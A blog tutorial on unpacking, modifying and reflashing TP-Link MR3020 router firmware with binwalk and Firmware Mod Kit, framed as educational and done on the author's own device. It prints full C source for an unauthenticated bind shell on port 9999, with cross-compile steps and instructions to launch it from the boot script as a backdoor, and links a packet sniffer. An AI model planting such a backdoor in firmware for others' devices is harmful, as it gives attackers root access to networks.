Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.
This post is all about modifying your existing router firmware to perform cool things.
Hardware and Tools Needed:
For the router, I am using a TP-Link MR3020. You may use whatever router you like but make sure you wonāt brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).
Download Firmware Mod Kit
If you examine you firmware using Binwalk you will get lots of useful information such as headers, sections, compressions used, etc.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
$ binwalk -t -vv ~/mr3020nv1_en_3_17_2_up_boot\(140610\).bin Scan Time: 2015-10-12 07:06:11 Target File: /root/mr3020nv1_en_3_17_2_up_boot(140610).bin MD5 Checksum: 4e44ca7cdabf7286228b8b4324e3d51a Signatures: 285 DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point: 0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 48393 14144 0x3740 U-Boot version string, "U-Boot 1.1.4-ge28c8345 (Jun 10 2014 - 17:57:47)" 15488 0x3C80 uImage header, header size: 64 bytes, header CRC: 0xC21F81, created: Tue Jun 10 05:57:48 2014, image size: 33353 bytes, Data Address: 0x80010000, Entry Point: 0x80010000, data CRC: 0x2DF367A0, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image" 15552 0x3CC0 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 95584 bytes 131584 0x20200 TP-Link firmware header, firmware version: 3.17.2, image version: "ver. 1.0", product ID: 0x30200001, product version: 1, kernel load address: 0x80002000, kernel entry point: 0x801D58B0, kernel offset: 512, kernel length: 892221, rootfs offset: 1048576, rootfs length: 2883584, bootloader offset: 0, bootloader length: 0 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2581428 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2594041 bytes, 624 inodes, blocksize: 131072 bytes, created: Tue Jun 10 06:04:31 2014 |
After installing the FMK I will extract my firmware for the MR3020.
|
1 |
$ ./extract-firmware.sh mr3020nv1_en_3_17_2_up_boot\(140610\).bin |
Next, you will see your extracted firmware inside the fmk directory. You can explore the file system of your router like this.
|
1 2 3 4 5 |
$ ls image_partsĀ logsĀ rootfs $ cd rootfs/ $ ls binĀ devĀ etcĀ libĀ linuxrcĀ mntĀ procĀ rootĀ sbinĀ tmpĀ usrĀ varĀ web |
Inside the āwebā directory the source code for the web application for the router running on port 80 can be found. This is an example where Iāve modified the banner of the ātop.htmā page.
After your modifications are done use this bash script inside the fmk directory and build the firmware.
|
1 |
$ ./build-firmware.sh |
My router uses Busybox. Busybox is a software that provides several stripped-down Unix tools in a single executable file.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
$ ls -la drwxr-xr-x 2 root root 4096 Jun 10 2014 . drwxrwxr-x 14 root root 4096 Jun 10 2014 .. -rwxr-xr-x 1 root root 267408 Jun 10 2014 busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 cat -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 chmod -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 date -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 df -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 echo -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 false -> busybox lrwxrwxrwx 1 root root 83 Oct 12 04:02 iptables-xml -> /data/jenkins/workspace/MR3020-REL/build/../rootfs.build.2.6.31/sbin/iptables-multi lrwxrwxrwx 1 root root 7 Oct 12 04:02 kill -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 login -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 ls -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 mount -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 msh -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 ping -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 ps -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 rm -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 sh -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 true -> busybox lrwxrwxrwx 1 root root 7 Oct 12 04:02 umount -> busybox |
We can first write a simple bind shell and test if it works. For that, I have written a simple bind shell in C using fork() so that it can handle multiple clients and wonāt be needed to restart the router each time the socket closes š
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define SERVER_PORT 9999 /* CC-BY: Osanda Malith Jayathissa (@OsandaMalith) * Bind Shell using Fork for my TP-Link mr3020 router running busybox * Arch : MIPS * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc */ int main() { int serverfd, clientfd, server_pid, i = 0; char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n"; char *args[] = { "/bin/busybox", "sh", (char *) 0 }; struct sockaddr_in server, client; socklen_t len; server.sin_family = AF_INET; server.sin_port = htons(SERVER_PORT); server.sin_addr.s_addr = INADDR_ANY; serverfd = socket(AF_INET, SOCK_STREAM, 0); bind(serverfd, (struct sockaddr *)&server, sizeof(server)); listen(serverfd, 1); while (1) { len = sizeof(struct sockaddr); clientfd = accept(serverfd, (struct sockaddr *)&client, &len); server_pid = fork(); if (server_pid) { write(clientfd, banner, strlen(banner)); for(; i <3 /*u*/; i++) dup2(clientfd, i); execve("/bin/busybox", args, (char *) 0); close(clientfd); } close(clientfd); } return 0; } |
https://github.com/OsandaMalith/TP-Link/blob/master/bindshell.c
Compile using the GCC cross compiler for the MIPS architecture.
|
1 |
$ mips-linux-gnu-gcc -o mybindshell mybindshell.c -static -EB -march=24kc |
We give the static option to compile with all external libraries. This is because the router uses busybox and some libraries might not support. The march=24k is according to the CPU model.
Since the size is huge Iāll strip the debugging symbols, etc.
|
1 |
$ mips-linux-gnu-strip ās mybindshell |
After that we can place this shell inside the ābinā directory and change the startup script to run our shell after booting. The ārcSā file can be found inside the ā/etc/rc.dā folder. This script will help us run our backdoor after everything is in a ready state.
As you can see I have given the shell to run in the background after the httpd daemon is executed.
Next, build the firmware and update your new firmware š
If I do a very basic nmap scan, you would see port 9999 is listening.
Here you go, my simple bind shell š
You can add a password to restrict access to everyone.
What else can we do? We can do lots of cool things but remember we have a limited size for everything. Hereās a simple sniffer wrote by Vivek. https://github.com/OsandaMalith/TP-Link/blob/master/sniffer.c
Compile it, strip it, build the firmware and upload it your device. Put your interface in Promiscuous mode and give the interface and the packet count, I will give br0 which has the default gateway. Hereās a sample output.
Likewise, you could lots of cool things with your router. Also check out openwrt. After installing it in your router you can do lots of cool stuff than modifying the existing firmware.
If you are interested in embedded hacking you may have a look at this awesome series on PentesterAcademy Make your own Hacker Gadget.
My bind shell was included in the book IoT Penetration Testing Cookbook in Chapter 3 https://github.com/PacktPublishing/IoT-Penetration-Testing-Cookbook/blob/master/Chapter03/03_codefile.txt
